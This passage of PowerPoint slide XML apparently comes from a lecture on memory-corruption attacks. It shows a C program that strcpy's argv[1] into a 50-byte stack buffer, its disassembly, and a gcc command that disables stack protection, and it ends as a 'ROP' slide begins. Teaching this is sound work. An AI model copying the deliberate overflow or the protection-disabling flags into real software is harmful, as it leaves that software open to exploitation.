                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, char** </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>foo [50];   </a:t>
            </a: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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 10;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>} </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>170</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="190041"/>
            <a:ext cx="5832763" cy="666795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2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  push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mov</a:t>
            </a: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esp</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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x3c,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xc(</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eax</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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>add</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$0x4,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,0x4(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-0x32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$0xa,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</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leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322202" y="5326464"/>
            <a:ext cx="7662440" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -Wall -static -O0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-protector -m32 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mpreferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-boundary=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rwxrwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>--- 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ubuntu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 716K Mar 22 22:43 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103343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ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
